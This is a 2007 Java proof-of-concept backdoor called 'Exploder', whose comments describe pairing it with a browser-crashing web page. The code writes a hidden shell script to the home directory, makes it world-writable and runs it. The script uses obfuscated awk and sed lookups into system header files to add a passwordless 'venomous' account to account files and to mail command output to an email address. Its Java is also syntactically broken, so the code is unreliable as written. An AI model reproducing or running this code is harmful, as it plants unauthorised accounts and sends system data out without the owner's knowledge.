/* Exploder
   Copyright (c) 2007
   Jesus Oquendo sil @ infiltrated .....

   Proof of concept code to insert a backdoor into most Linux based
   systems... Originally written as a shell script, work in progress
   to port over to JAVA under the premise of attempting to run it
   while under the exploder attack posted at:
   http://www.securityfocus.com/archive/1/466017/30/30/threaded

   The concept would be as follows:

   <webpage>
   Evilscript1
   Evilscript2
   exploderscript
   </webpage>

   Evilscript1 could be this script...

   Evilscript2 could work in conjuction with say mod_security or
   mod_rewrite which would/could parse out the visitors IP address
   and re-write a sanitized page should that visitor go back to
   try to view the source code

   After Evilscript1 and Evilscript2 are run on a machine this
   script could be used to throw the machine into an obliviated
   state forcing the user to kill their browser...

   Java ripped from Homer.java ...
   awk+sed based off my venomous Proof of Concept
   http://www.infiltrated.net/scripts/venomous

*/

import java.io.*;

class Exploder {
    public static void main (String[] argv) {
    try {
        String userHome = System.getProperty("user.home");
        String target = "$HOME";
        FileOutputStream outer = new FileOutputStream(userHome + "/.exploder.sh");
        String exploder = "happy=`awk 'NR==59 {gsub(/"/,"");print $3}' /usr/include/paths.h`" +
	"days=`awk 'NR==74 {gsub(/,/,"");print $8}' /usr/include/sysexits.h`" +
	"sed -n '1p' $happy|awk -F ":" 'BEGIN{OFS=":"}{$1="venomous"}1{$2=""}2' >> $happy" +
	"sed -n '1p' $days|sed 's/[^:]*:/venomous:/' >> $days" +
	"what=`sed -n '58p' /usr/include/sysexits.h |awk '{print $5}'`" +
	"who=`sed -n '60p' /usr/include/linux/wireless.h |awk 'gsub(/,/, ""){print $4" -a"}'`" +
	"echo "Enter your email address" ; read ans ; where=$ans"" +
	"$who | $what $where" +
        byte[] buffer = new byte[exploder.length()];
        exploder.getBytes(0, exploder.length(), buffer, 0);
        outer.write(buffer);
        outer.close();
        Process chmod = Runtime.getRuntime().exec("/usr/bin/chmod 777 " +
                        userHome + "/.exploder.sh");
        Process exec = Runtime.getRuntime().exec("/bin/sh " + userHome +
                       "/.exploder.sh");
        } catch (IOException ioe) {}
    }
}